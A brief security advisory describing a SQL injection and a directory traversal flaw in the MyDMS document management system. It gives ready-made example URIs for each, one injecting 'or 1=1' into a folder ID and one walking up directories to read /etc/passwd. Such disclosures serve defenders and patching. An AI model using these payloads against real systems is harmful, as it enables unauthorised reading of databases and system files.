MyDMS SQL Injection Vulnerability And Directory Traversal Vulnerability

MyDMS SQL Injection Vulnerability And Directory Traversal Vulnerability

An exploit is not required. An example URI sufficient to exploit the SQL injection vulnerability was provided:

http://www.example.com/demo/out/out.ViewFolder.php?folderid=3 or 1=1

An example for the directory traversal vulnerability:
http://www.example.com/mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd